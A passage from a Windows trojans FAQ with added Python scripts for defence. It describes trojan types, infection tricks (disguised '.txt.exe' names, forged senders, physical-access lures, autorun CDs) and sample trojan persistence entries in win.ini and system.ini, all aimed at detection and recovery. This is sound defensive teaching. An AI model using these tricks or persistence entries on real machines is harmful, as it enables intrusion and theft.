These are probably the most publicly used Trojans, simply because they give the attackers the power to do more things on the victim's machine than the victim himself, while standing in front of the machine. The idea of these Trojans is to give the attacker COMPLETE access to someone's machine, and therefore access to files, private conversations, accounting data, etc.



Password Sending Trojans



The purpose of these trojans is to rip all cached passwords, and also to look for other passwords you're entering, then send them to a specific mail address without the user noticing anything. Passwords for ICQ, IRC, FTP, HTTP or any other application that requires a user to enter a login and password are sent back to the attacker's e-mail address.



Keyloggers



These trojans are very simple. The only thing they do is to log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. Most of them come with two functions such as online and offline recording. Of course they could be configured to send the log file to a specific e-mail address on a daily basis.



Destructive



The only function of these trojans is to destroy and delete files. This makes them very simple and easy to use. They can automatically delete all your core system files (for example: .dll, .ini or .exe files, possibly others) on your machine.



Denial Of Service (DoS) Attack Trojans



These trojans are becoming very popular these days, giving the attacker the power to start a DDoS, if he/she has infected enough victims of course. The main idea is that if you have 200 ADSL users infected and they start attacking the victim simultaneously, this will generate a LOT of traffic (more than the victim's bandwidth, in most cases) and its access to the Internet will be shut down. WinTrinoo is a DDoS tool that has become really popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result, as we've seen happen in the past few months.



Another variation of a DoS trojan is the mail-bomb trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.



Proxy/Wingate Trojans



An interesting feature implemented in many trojans is the ability to turn the victim's computer into a proxy/wingate server available to the whole world or only to the attacker. It's used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for many other illegal activities. This gives the attacker complete anonymity and the chance to do everything from YOUR computer and if he/she gets caught the trace leads back to you.



FTP Trojans



These trojans are probably the simplest ones and are kind of outdated, as the only thing they do is open port 21 (the port for FTP transfers) and let EVERYONE, or only the attacker, connect to your machine. Newer versions are password protected so only the one who infected you may connect to your computer.



Software Detection Killers



There are such functionalities built into some trojans, but there are also separate programs that will kill ZoneAlarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs that protect your machine. When they are disabled, the attacker will have full access to your machine, enabling the attacker to perform some illegal activity, use your computer to attack others and often disappear. Even though you may notice that these programs are not working or functioning properly, it will take you some time to remove the trojan, install the new software, configure it and get back online with some sense of security.

07.In what ways could I be infected?




The Complete Windows Trojans Paper discusses in depth each of the possible scenarios as far as becoming infected with a trojan is concerned. You're strongly advised to look at them closely, so that you are able to understand and properly react to the threat posed by Windows Trojans.



Via ICQ



People don't understand that they can also get infected while talking via ICQ or any other Instant Messenger application. Receiving files is always risky, no matter from whom and no matter from where.



Believe it or not, there are still guys out there using really old versions of ICQ and it's all because they can see the IP of the person they're talking to. The older versions of ICQ had such functionality and it was useful for everyone capable of using winnuke and other DoS tools, but really how hard is it to launch such attacks with only the click of the mouse? These people are often potential victims of someone that is more knowledgeable on Windows Trojans and takes advantage of their old ICQ versions.



Let's review various ways of getting infected via ICQ:



You can never be 100% sure who's on the other side of the computer at that particular moment. It could be someone that hacked your friend's ICQ UIN (Unique Identification Number) and wants to spread some trojans among his/her friends. You'll definitely trust your best dude Bob if he offers you something interesting, but is it really Bob on the other side?

Old versions of ICQ had bugs in the WebServer feature, which creates a site on your computer, with your info from the ICQ database. The bug constitutes a security hole in that the attacker can have access to EVERY file on your machine and if you read the previous sections carefully and know the auto-start methods, you'll probably realize what could happen if someone has access to your win.ini or other system file, namely a trojan installed in a few minutes.

Trojan.exe is renamed Trojan....(150 spaces).txt.exe, icon changed to a real .txt file and this will definitely get you infected. This bug has almost certainly been fixed in the newer version.

No matter which Instant Messenger Application you're using, you could always get yourself infected by certain program bugs that you have never had the chance to hear about, and never took the precaution of checking for newer versions of the application. Also when you're receiving files no matter where and no matter from whom, take this potential threat very seriously and recognize the dangers of naive behavior.



Via IRC



So many people LIVE on IRC and this is another place where you can get yourself infected. Trust is vital no matter what you're doing. No matter who is sending you files, whether they are pretending to be free porn archive, whether offering software for "free internet" or offering a Hotmail hacking program, DO NOT download any of these files. Newbies are often targets of these fakes, and believe me, many people are still newbies where security is concerned. Users get infected from porn-trade channels, and of course, warez channels, as they don't think about the risk but think only of getting free porn and free programs instead.



Here are several scenarios of how you may become infected while using IRC:



You're talking with someone, probably a "girl", having great time and of course, you want to see the person you're talking to. You ask for a picture or the "girl" offers you her pictures and I'm sure you'll definitely want to see them. The "girl" says that she has just created her first screensaver using some known free or commercial software and offers it to you, but how about if "she" mentions several pictures are nude ones?! You have been talking to "her" for a week or so, you get this screensaver.exe, you run it and yeah, VERY nice pics. Some are nude and she hasn't lied to you so nothing bad or suspicious has happened BUT think again what really has happened!

Trojan.exe could also be renamed into Trojan.scr like a screensaver extension and will again run properly when you execute it so pay attention about these file extensions.

Trojan.exe is renamed Trojan....(150 spaces).txt.exe; you'll get the file over IRC, and in the DCC it will appear as .TXT, so as a result you won't become suspicious, you'll run it, and you'll get yourself infected again. In all of these examples the icon of the file is changed too, of course, because it needs to be the same icon as a normal .TXT file, and this fools victims very often.

Most people don't notice in their Explorer that the Type of the file is Application BUT with a .TXT icon. So BEFORE you run something, even if it's with a .TXT icon, check its extension and make sure it really is a text file.
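The renaming tricks in the last few points (a decoy .txt in front of the real .exe, a long run of spaces, an .scr that is really a program) can be checked mechanically before a file is ever opened, which is what the advice above amounts to. The following Python function is an added example, not code from the original paper or its author: it splits a file name into its decoy and real extensions, looks for space padding, and compares the name against the file's first two bytes, since Windows executables begin with `MZ` whatever their name or icon says. The sample names and bytes are constructed for the demonstration.

```python
import re

# Extensions Windows runs directly; the tricks above rely on .exe and .scr.
RUNNABLE_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif"}
# Extensions a user expects to be plain data.
INNOCENT_EXTENSIONS = {".txt", ".jpg", ".jpeg", ".gif", ".bmp", ".doc", ".pdf"}

# stem, optional decoy extension, optional whitespace padding, real extension
_EXT_RE = re.compile(r"^(.*?)(\.[a-z0-9]{1,5})?\s*(\.[a-z0-9]{1,5})$")


def split_extensions(name):
    """Return (stem, decoy_ext, real_ext); decoy_ext is '' for a single extension."""
    m = _EXT_RE.match(name.lower().rstrip())
    if not m:
        return name.lower(), "", ""
    stem, decoy, real = m.groups()
    return stem, decoy or "", real


def inspect_file(name, data=b""):
    """List the ways a file's name or header disguises an executable.

    `data` is the start of the file's contents; a Windows executable starts
    with the two bytes "MZ" regardless of the name it was given.
    """
    reasons = []
    _, decoy, real = split_extensions(name)
    if real in RUNNABLE_EXTENSIONS:
        reasons.append(f"name ends in the runnable extension {real}")
        if decoy in INNOCENT_EXTENSIONS:
            reasons.append(f"decoy extension {decoy} sits in front of {real}")
    if re.search(r" {5,}", name):
        reasons.append("a long run of spaces pushes the real extension out of view")
    if data[:2] == b"MZ" and real not in RUNNABLE_EXTENSIONS:
        reasons.append("contents start with an MZ executable header")
    return reasons


# Constructed samples (names and bytes made up for the demonstration).
SAMPLES = [
    ("notes.txt", b"Just some text.\r\n"),
    ("Trojan" + " " * 150 + ".txt.exe", b"MZ\x90\x00"),   # the renaming trick above
    ("holiday_pics.scr", b"MZ\x90\x00"),                     # screensaver trick
    ("report.pdf", b"MZ\x90\x00"),                           # executable with a data name
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        shown = name if len(name) < 40 else name[:10] + "..." + name[-8:]
        print(shown, "->", inspect_file(name, data) or ["looks consistent"])
```

The header check is the one that matters most: Explorer shows the type "Application" because of the real extension, but an attacker who renames the file to report.pdf outright still cannot change the `MZ` signature, so reading the first bytes catches cases the name alone would not.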

Via Attachments



I'm always amazed by the number of people that get themselves infected by an attachment sent to their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive an email containing an attachment saying that they will get free porn, free Internet access etc., they run it without completely understanding the risk to their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he's coding his latest program but you're curious as to what it is all about, and when he finishes coding the application you wait for an e-mail from him with the attachment. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend's e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail's FROM field and make it look like your friend's one. Alex's e-mail address is alex@example.com so the attacker's FROM field will be changed to alex@example.com and of course, it will include the TROJANED attachment... You'll check your mail, see that Alex finally has his program ready and has sent it as an attachment. You'll download and run it without thinking that it might be a trojan or something else, because hey, Alex wouldn't do something like that to me, he's my friend, and in this way you've just been infected.



Information Is Power! Simply because the attacker knew you were waiting for some particular file, he went ahead and found Alex's e-mail address and infected you...the timing of the attack assumes importance here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn't check the mail headers to see that the mail actually came from some .jp mail server relaying e-mails and has been used by spammers for several months.



Many people have gotten themselves infected by the famous "Microsoft Internet Explorer Update" sent directly to their mailboxes, by the nonexistent Microsoft Updates Staff. I understand you may have felt great because Microsoft were paying you special attention and sent you the latest updates, but these "updates" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail even if you see that the FROM field is updates@microsoft.com and as you've noticed in the previous example the FROM field could be and IS faked. If you ever notice some mail in your mailbox with subjects like "Microsoft IE Update" and such, delete WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others, have bugs that automatically execute the file being attached in the e-mail WITHOUT you even touching it. As you can imagine this is an extremely dangerous problem that requires you to keep yourself constantly up-to-date with the latest version of any software you're using.
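Checking the mail headers, as the Alex scenario above recommends, means reading the `Received:` chain rather than trusting the `From:` field. The script below is an added example, not from the original paper or its author, and uses only Python's standard `email` module: it lists the relays the message actually passed through, oldest first, checks whether any of them belongs to the domain claimed in `From:`, and lists attachments with runnable extensions. The message is a constructed sample; `example.com`, `victim.example` and `relay.example.jp` are placeholder names, and `192.0.2.77` and `198.51.100.23` are documentation addresses.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: the attacker hands the mail to a relay in another
# country and claims (HELO) to be Alex's mail server; the relay records
# what it really saw, and our own server records the relay.
SAMPLE_MESSAGE = b"""\
Received: from relay.example.jp (relay.example.jp [192.0.2.77])
\tby mx.victim.example (Postfix) with ESMTP id 4A1B2C3D
\tfor <you@victim.example>; Tue, 11 Jul 2000 10:21:02 +0000
Received: from unknown (HELO mail.example.com) (198.51.100.23)
\tby relay.example.jp with SMTP; Tue, 11 Jul 2000 10:20:55 +0000
From: Alex <alex@example.com>
To: you@victim.example
Subject: my new program, finally!
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

try it out
--b1
Content-Type: application/octet-stream; name="program.exe"
Content-Disposition: attachment; filename="program.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--b1--
"""

RUNNABLE_EXTENSIONS = (".exe", ".scr", ".com", ".bat", ".pif")
_RECEIVED_FROM_RE = re.compile(r"^from\s+(\S+)", re.IGNORECASE)


def received_chain(msg):
    """Return the host named in each Received: header, oldest hop first.

    Every server prepends its own Received: line, so the header nearest the
    body is the oldest hop, the one closest to the real sender.
    """
    hops = []
    for value in msg.get_all("Received", []):
        m = _RECEIVED_FROM_RE.match(" ".join(str(value).split()))
        hops.append(m.group(1).lower() if m else "?")
    return list(reversed(hops))


def from_domain(msg):
    """Domain part of the From: address (trivially forged, as the FAQ notes)."""
    _, addr = parseaddr(str(msg.get("From", "")))
    return addr.rpartition("@")[2].lower()


def runnable_attachments(msg):
    """File names of attachments Windows would execute directly."""
    return [
        part.get_filename()
        for part in msg.iter_attachments()
        if (part.get_filename() or "").lower().endswith(RUNNABLE_EXTENSIONS)
    ]


def assess(raw):
    """Summarize the checks the FAQ asks a reader to make before trusting mail."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    domain = from_domain(msg)
    hops = received_chain(msg)
    # Did any relay in the chain belong to the claimed sender's domain?
    via_claimed_domain = any(h == domain or h.endswith("." + domain) for h in hops)
    return {
        "from_domain": domain,
        "route": hops,
        "route_never_touched_from_domain": not via_claimed_domain,
        "runnable_attachments": runnable_attachments(msg),
    }


if __name__ == "__main__":
    for field, value in assess(SAMPLE_MESSAGE).items():
        print(f"{field}: {value}")
```

Only the `Received:` line written by your own server (the top one) is trustworthy; the ones below it were written by whoever handled the message earlier and can be forged too. That is why the check asks whether the route ever passed through the sender's domain at all, rather than trusting the HELO name the attacker supplied.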



Physical Access



Physical access is vital for your computer's security. Imagine what an attacker could do while having physical access on your machine, and let's not forget to mention that if you're always connected to the Internet and leave the room for several minutes that you've just given long enough of a chance to get yourself infected. Here I'll illustrate several scenarios often used by attackers to infect your computer while they're having physical access to your machine. There are some very smart people out there that keep thinking of new ways of gaining physical access to someone's computer. Here are some tricks that are interesting:



Your "friend" wants to infect you with a trojan and he/she has physical access to your machine. Let's say you were at home surfing the net, chatting or whatever. Suddenly your "friend" asks you for a glass of water, knowing that you'll go into another room and will be away for 1 or 2 minutes. While you do that, he/she takes a diskette out of his/her pocket and infects your unprotected PC. You come back and everything is OK, because your "friend" is doing exactly what he/she was doing before you left...surfing the net.

The next example is when 2 guys want to take revenge on you because of something and are supporting each other in order to accomplish their task. Again you are at home with your "friend", surfing, chatting, whatever you're doing; suddenly the telephone rings and a "friend" of yours wants to speak with you about something that is really important. He/she asks, "Is there anyone around you? If so, please move somewhere away from him/her (after knowing it is him or her, of course). I don't want anyone to listen to what I'm going to tell you". The victim is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer.

Other approaches similar to the previous ones might be a sudden ring of the doorbell, as well as other variations of phone calls and conversations leaving the attacker alone with the victim's computer. There are so many other possible approaches; just think for a while and you'll see what I mean and how easily you could be tricked, and it's because you're not suspicious enough when it comes to your sensitive computer data.

Another method of infecting a computer while having physical access is through use of the Auto-Starting CD function. You've probably noticed that when you place a CD in your CDROM it automatically starts with some setup interface. Here's an example of the Autorun.inf file that is placed on such CD's:

[autorun]

open=setup.exe

icon=setup.exe



So you can imagine that while running the real setup program a trojan could be run VERY easily, and since most of you probably aren't aware of this CD function, you will become infected and won't understand what has happened and how it has been done. Yeah, I know it's convenient to have the setup.exe autostart but security is what really matters here, that's why you should turn off the Auto-Start functionality by doing the following:



Start Button->Settings->Control Panel->System->Device Manager->CDROM->Properties->Settings



And there you'll see a reference to Auto Insert Notification. Turn it off and you won't have any problems with that function anymore.
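The three INI-style files this paper names as auto-start locations, win.ini (load= and run=) and system.ini (Shell=) in the "How do Trojans work?" section and the Autorun.inf shown just above, share one `[section]` / `key=value` layout, so a single small parser can audit all of them. The script below is an added example for this page, not code from the original paper or its author; it flags a non-empty load= or run=, a Shell= line that names anything besides Explorer.exe, and whatever an autorun.inf would launch (its open= entry, plus the shellexecute= entry that later versions of the format also accept). The file contents embedded in it are constructed samples.

```python
def parse_ini(text):
    """Return {section: [(key, value), ...]} keeping order and duplicate keys.

    configparser is not used because these files may repeat keys and contain
    lines without '=', which it rejects.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def _values(sections, section, key):
    return [v for k, v in sections.get(section, []) if k == key]


def audit_win_ini(text):
    """On a clean system the load= and run= lines under [windows] are empty."""
    sections = parse_ini(text)
    return [
        f"win.ini [windows] {key}={value}"
        for key in ("load", "run")
        for value in _values(sections, "windows", key)
        if value
    ]


def audit_system_ini(text):
    """[boot] shell= should name Explorer.exe and nothing after it."""
    findings = []
    for value in _values(parse_ini(text), "boot", "shell"):
        parts = value.split()
        if not parts or parts[0].lower() != "explorer.exe" or len(parts) > 1:
            findings.append(f"system.ini [boot] shell={value}")
    return findings


def audit_autorun_inf(text):
    """Everything a CD's autorun.inf would launch on insertion."""
    sections = parse_ini(text)
    launched = _values(sections, "autorun", "open") + _values(sections, "autorun", "shellexecute")
    return [f"autorun.inf would launch: {v}" for v in launched]


# Constructed sample files (not copied from a real machine).
SAMPLE_WIN_INI = r"""[windows]
load=
run=c:\directory\Trojan.exe
NullPort=None
[Desktop]
Wallpaper=(None)
"""
SAMPLE_SYSTEM_INI = r"""[boot]
shell=Explorer.exe trojan.exe
[386Enh]
device=*vshare
"""
SAMPLE_AUTORUN_INF = r"""[autorun]
open=setup.exe
icon=setup.exe
"""


def audit_all(win_ini=SAMPLE_WIN_INI, system_ini=SAMPLE_SYSTEM_INI, autorun_inf=SAMPLE_AUTORUN_INF):
    """Run all three checks and return the combined list of findings."""
    return audit_win_ini(win_ini) + audit_system_ini(system_ini) + audit_autorun_inf(autorun_inf)


if __name__ == "__main__":
    for finding in audit_all():
        print(finding)
```

To check a real machine, read C:\Windows\win.ini and C:\Windows\system.ini and pass their text to the two audit functions; for a CD, read the autorun.inf from its root before letting it auto-run. A setup.exe listed under open= is expected on an installation CD; the point of listing it is that you see the name before Windows runs it, rather than after.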



I know MANY other variations of physical access infections but these are the most common ones so pay attention and try to think up several more by yourself.



When the victim IS connected to the Internet:



Here we have many variations. Again, I'll mention the most common ones. While the attacker has physical access he/she may download the trojan.exe, using various ways just by knowing how various Internet protocols work.



A special IRCbot known only to the attacker is available in IRC whose only function is to DCC the trojan.exe back to the attacker whenever he/she messages the bot with a special command. The victim will probably be away from the computer.

The attacker wants to download a specific software such as a new version of some program infected with a trojan of course, and visits some URL known only to him/her and then downloads the trojan.

The attacker pretends he/she wants to check his/her (web based) mail (for example, at Yahoo! or HotMail) but in fact has the trojan.exe stored in his/her mailbox and simply downloads and executes the file, hereby infecting the computer. In this case the mail service is used as a storage area.

There are many more ways of infecting the victim while connected to the Net, as you can imagine. Any of these examples will succeed but it all depends on the victim's knowledge of the Internet and how advanced his/her skills are, so the attacker needs to check these things somehow before doing any of the activities that I have mentioned here. After that, the attacker will be able to choose the best variant for infecting the victim and doing the job.



Browser And E-mail Software Bugs



Users do not update their software versions as often as they should, and a lot of attackers take advantage of this well known fact. Imagine you are using an old version of Internet Explorer and you visit a (malicious) site that will check and automatically infect your machine without you having downloaded or executed any programs. The same scenario occurs when you check your e-mail with Outlook Express or some other software with well known problems. Again you will be infected without having downloaded the attachment. Make sure that you always have the latest version of your browser and e-mail software, thus reducing the risk to a minimum.



Netbios(File Sharing)



If port 139 on your machine is open, you're probably sharing files, and this is another way for someone to access your machine, install trojan.exe and modify some system file so that it will run the next time you restart your PC. Sometimes the attacker may use a DoS (Denial Of Service) attack to shut down your machine and force you to reboot, so the trojan can restart itself immediately. To block file sharing in Win ME, go to:



Start->Settings->Control Panel->Network->File And Print Sharing



And uncheck the boxes there. That way you won't have any problems related to Netbios abuse.



Fake Programs



Imagine a freeware SimpleMail program that's very suitable for your needs, and very handy with its features like an address book, an option to check several POP3 accounts and many other functions that make it even better than your e-mail client, and the best thing for you is that it's free. You use ZoneAlarm or any other similar protection software, and mark the program as a TRUSTED Internet server so none of your programs will ever bother you about it; you are probably using it every day because it's working very well, no problems ever occurred, you're happy, but a lot of things are going on in the background. Every mail you send and all your passwords for the POP3 accounts are being mailed directly into the attacker's mailbox without you noticing anything. Cached passwords and your keystrokes could also be mailed; the idea here is to gather as much info as possible and send it to the attacker. This info includes credit card numbers, passwords for various applications and many other things. Fake programs that have hidden functions often have professional looking web sites and links to various anti-trojan software mentioned as affiliates to make you trust the site; a readme.txt is included in the setup, and many other things are done to fool you into trusting it. Pay attention to the freeware tools that you download; regard them as extremely dangerous and as a very useful and easy way for attackers to infect your machine with a Trojan.



Freeware Software, and the so called "Hackers" Web Sites



A site located at some free web space provider, or one just offering programs for illegal activities, can be considered an untrusted one. As you know, there are thousands of "hacking/security" archives on free web space providers like Xoom, Tripod, Geocities and many many others. These sites have archives filled with "hacking" programs, scanners, mail-bombers, flooders and many other tools. The guy who created the site often infects several, if not all, of these programs. It's highly risky to download any of the programs and tools located on such untrusted sites, no matter which software you use. Are you ready to take that risk? There are some untrusted sites that look REALLY professional and boast huge archives full of Internet related software, feedback forms and links to other popular sites. I think if you take some time, look deeper, and scan all the files you download, then you can decide on your own whether the site you are downloading your software from is a trusted or an untrusted one. Freeware programs should be considered suspicious and extremely dangerous, due to the fact that a freeware program is a very easy and useful way for the attacker to infect your machine. No matter how suitable you find the program, remember that "free is not always the best" and it's very risky to use any of these programs. My advice is: before using a freeware program, search for some reviews of it, check popular search engines, and try to look up some info about it. If you find any reviews written by respected sites, that means they've used and tested it and the chance of infection is thereby minimized. If no reviews or comments about the software are found via the search engines, then it may be highly risky to start using it.

08.How am I endangering my company's data once infected?


Once infected, critical business data could be exposed to a malicious attacker or a corporate spy. You should not assume that the data is properly protected by the company's firewall, or that even if you get infected there would be no way for the attacker to get the data. Firewalls are essential and will block attempts to connect to the Server (your computer); however, attackers are becoming more creative and adaptive, so there are ways to retrieve the data without the need to connect to your computer. You can also unknowingly participate in exposing the whole network at work to attack, just by having your computer infected with a Trojan Horse.

09.Why would they target me, or my company?



In fact most of the times no one is targeting you in particular, it's just your bandwidth and the access to your computer that they're trying to get to. However there is the possibility that someone wants to attack you or your company in order to obtain classified business or sensitive personal data.

10.Do Anti-Virus Scanners provide reasonable protection?



You must realize that there isn't a 100% sure way of protecting against Windows Trojans infections, although your major aim is to significantly reduce the risk by understanding how they work and how you could become infected.



This type of software relies mainly on the "signatures" that each trojan executable has, and also on its common auto-starting methods. But this is far from a perfect solution for protecting yourself against trojans, as they use many other methods to hide inside the machine, most of which are undetected by Anti-Virus software. When trojans first became a big security breach, specific Anti-Trojan packages were released to the public, and it became necessary for the AVs to start detecting not only viruses but also trojans if they wanted to attract new users. As a result, most of them became really advanced trojan scanning and detection systems, but for maximum protection it's recommended to use both Anti-Virus and Anti-Trojan software. Public trojans appear online almost every day and detection software is updated every day to provide its customers with maximum protection. One very big problem is that users do not update their signature files as often as they should, and so end up with detection software that does not detect several of the latest trojans or viruses. Users MUST update their software's signature files every day, and it will take them only several minutes. Each and every time a new file is downloaded, it MUST be scanned with Anti-Virus and Anti-Trojan software BEFORE being opened. If you think the file is suspicious for any reason, do NOT run it, but send it to your detection software's labs for analysis.


11. Are there any effective Anti-Trojan Packages?


Yes, there are, although you should never rely on them completely, as they only partly solve the problem. It is you who has the responsibility of maintaining an acceptable level of protection. These packages are suited to standalone computers or very small networks; companies that want to limit the dangers posed by their Internet connectivity should also use Gateway Protection Packages.



Here are some of the popular Anti-Trojan Packages. In a company's Defense In Depth methodology their role is to add another line of defense by protecting the end users' workstations.



Enduser Protection Packages



TDS-3

Trojan Defense Suite (TDS) is a must-have package for protection against trojans, with many functions not found in other Anti-Trojan packages. The program has very advanced features, and if you are a newbie it will probably take some time before you are able to use the software at its full capacity (read the excellent help files).



You can get TDS from http://tds.diamondcs.com.au/



Tauscan

A trojan scanner with unique features that is also a must-have. It is advertised as able to detect new trojans, including ones that have never been released to the public. More info at its official page: http://www.agnitum.com/products/tauscan/



Trojan Hunter

A trojan detection package with a lot of functions; very handy.

More info at http://www.mischel.dhs.org/trojanhunter.jsp



Gateway Protection Packages



GFI MailSecurity

McAfee Internet Gateway Protection

TrendMicro's Internet Gateway

Symantec AntiVirus Gateway Solution

Symantec AntiVirus for SMTP Gateways

Free Online Trojan Scanning



GFI TrojanScan




12. How do I know whether I have been infected?


The most common trojan features have been listed above, so that by knowing them you will be able to detect suspicious activity on your computer. Keep in mind, however, that advanced attackers will keep as silent as possible in order to continue their illegal actions on your computer. The following events should be considered suspicious:



It is normal to visit a web site and have several more pop-ups appear along with the page you visited. But if your browser suddenly directs you to some page unknown to you without you having done anything at all, take that as a serious indication of infection.

A strange and unknown Windows Message Box appears on your screen, asking you some personal questions.

Your Windows settings change by themselves: new screensaver text, the date/time or sound volume changes, your mouse moves by itself, the CD-ROM drawer opens and closes.

You are doing absolutely nothing and no Internet-related applications are running, but your modem lights are going crazy, just the way they do when you are downloading files or actively using the Internet. Consider this an extremely suspicious sign.

GFI Software's online Trojan scanning service (listed above under Free Online Trojan Scanning) is another highly recommended way to scan your computer for Trojans.





13. What should I do once infected?

Account data such as ISP passwords and ICQ, mIRC, FTP, web site and e-mail passwords are definitely known to the attacker. Contact your ISP about changing your dial-up password if you use such a connection. Immediately change your ICQ and mIRC passwords if they are still the same. (Attackers often leave your logins and passwords unchanged to fool you into thinking that everything is OK, so there is a good chance you will still be able to recover from the compromise.) Change your web-based e-mail passwords and check the account information stored there, because the password retrieval services of e-mail providers such as Yahoo and Hotmail use this info combined with a "Secret Question" for password retrieval. Attackers often change that info, the answer to the secret question and other details that will get them easily back into your mailbox, whether you have changed your password or not.

If you use the handy Address Book feature of your e-mail service and have a list full of the e-mail addresses of friends, colleagues, etc., there is a real possibility that the attacker has sent them a trojan and possibly infected them too. Mail all of these people and ask whether they have received any files from your mailbox; inform them that someone else may know your e-mail password, so that they can take appropriate action such as checking their machines for Trojans. Do the same with the people on your ICQ contact list, as they may be targeted too.

Check your HDD for abnormal activity, such as a lot of free space going missing. Search for warez and, as mentioned earlier, kiddie-porn archives that the attacker may be storing on your machine.

Think for a while about the sensitive information you had on your machine before the compromise, and if there is a real possibility that the attacker now possesses this information, take appropriate action, such as informing the institutions that own the sensitive data that a breach has occurred.

Scan your machine with an Anti-Virus scanner, as the attacker could have placed a virus or infected macro documents on your machine to do destructive things even after he no longer has access to it.

Monitor your processes BEFORE and AFTER connecting to the Internet, as some trojans start only when they detect an Internet connection. Compare the two lists and treat any process or network connection that appears only after going online as suspect. Don't be fooled again; be very suspicious.
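One way to make the before/after comparison systematic, as an added example that is not part of the original paper: take a snapshot of the process list and the open sockets before dialling in, take another one afterwards, and diff them. The parsers below read the output formats of the standard Windows commands `tasklist /FO CSV /NH` and `netstat -ano`; the BEFORE/AFTER text embedded in the block is constructed sample output, and the process name winupdate.exe, the listening port 27374 and the addresses 203.0.113.7 / 198.51.100.20 are made-up values for the demo, not indicators from the paper.

```python
"""Process/socket snapshot diff for the "monitor your processes BEFORE and AFTER" step.
Added example (not from the original paper). Parses `tasklist /FO CSV /NH` and
`netstat -ano` output; the BEFORE/AFTER strings below are constructed sample output and
winupdate.exe / port 27374 / 203.0.113.7 are made-up demo values."""
import csv
import io
import platform
import subprocess
from typing import NamedTuple


class Proc(NamedTuple):
    name: str
    pid: int


class Sock(NamedTuple):
    proto: str
    local: str
    remote: str
    state: str
    pid: int


def parse_tasklist(text):
    """Rows look like "explorer.exe","1324","Console","1","24,132 K"; csv handles the quoted comma."""
    return {Proc(row[0].lower(), int(row[1])) for row in csv.reader(io.StringIO(text))
            if len(row) >= 2 and row[1].isdigit()}


def parse_netstat(text):
    """TCP rows carry a State column, UDP rows do not; header and blank lines are skipped."""
    socks = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            proto, local, remote, state, pid = parts
        elif len(parts) == 4 and parts[0] == "UDP":
            proto, local, remote, pid = parts
            state = ""
        else:
            continue
        socks.add(Sock(proto, local, remote, state, int(pid)))
    return socks


def live_snapshot():
    """Take a real snapshot (Windows only); returns (procs, socks)."""
    if platform.system() != "Windows":
        raise RuntimeError("live collection needs tasklist/netstat, i.e. Windows")
    tl = subprocess.run(["tasklist", "/FO", "CSV", "/NH"], capture_output=True, text=True).stdout
    ns = subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout
    return parse_tasklist(tl), parse_netstat(ns)


def diff_snapshots(before, after):
    """Return (new processes, new sockets, suspicious). `suspicious` is every new socket owned
    by a process that did not exist before going online: the pattern of a trojan that waits
    for an Internet connection and then opens a backdoor port or phones home."""
    new_procs = after[0] - before[0]
    new_socks = after[1] - before[1]
    new_pids = {p.pid for p in new_procs}
    suspicious = sorted(s for s in new_socks if s.pid in new_pids)
    return new_procs, new_socks, suspicious


# Constructed sample output of the two commands, before and after going online.
BEFORE_TASKLIST = '''"System Idle Process","0","Services","0","8 K"
"svchost.exe","880","Services","0","5,212 K"
"explorer.exe","1324","Console","1","24,132 K"
'''
AFTER_TASKLIST = BEFORE_TASKLIST + '"winupdate.exe","2048","Console","1","1,944 K"\n'
BEFORE_NETSTAT = '''
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  UDP    0.0.0.0:500            *:*                                    880
'''
AFTER_NETSTAT = BEFORE_NETSTAT + '''  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING       2048
  TCP    192.168.1.5:1041       203.0.113.7:6667       ESTABLISHED     2048
  TCP    192.168.1.5:1042       198.51.100.20:80       ESTABLISHED     1324
'''


def demo():
    """Diff the constructed snapshots; on a real box use live_snapshot() twice instead."""
    before = (parse_tasklist(BEFORE_TASKLIST), parse_netstat(BEFORE_NETSTAT))
    after = (parse_tasklist(AFTER_TASKLIST), parse_netstat(AFTER_NETSTAT))
    return diff_snapshots(before, after)


if __name__ == "__main__":
    new_procs, new_socks, suspicious = demo()
    for p in sorted(new_procs):
        print(f"new process: {p.name} (PID {p.pid})")
    for s in suspicious:
        print(f"SUSPICIOUS: PID {s.pid} {s.proto} {s.local} -> {s.remote} {s.state}")
```

In the sample, explorer.exe (PID 1324) also opens a new connection after going online, but it existed before, so it is reported as a new socket rather than flagged; the new process that both appeared and started listening and talking to a remote host is what the diff singles out. A trojan that injects into an existing process would not show up as a new PID, which is why the full list of new sockets is returned as well.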

14. Are there any other quality papers concerning the Windows Trojans subject?



Yes, there are. Follow the links below:



http://secinf.net/trojans/The_Complete_Windows_Trojans_Paper.html

http://www.jmu.edu/computing/info-security/engineering/issues/remote.shtml

http://members.ozemail.com.au/~netsafe/trojan_index.html

http://researchweb.watson.ibm.com/antivirus/SciPapers/Whalley/inwVB99.html

http://researchweb.watson.ibm.com/antivirus/SciPapers/Smoke/smoke.html

http://www.frame4.com/content/files/the_gentle_art_of_trojan_horsing_under_windows.txt

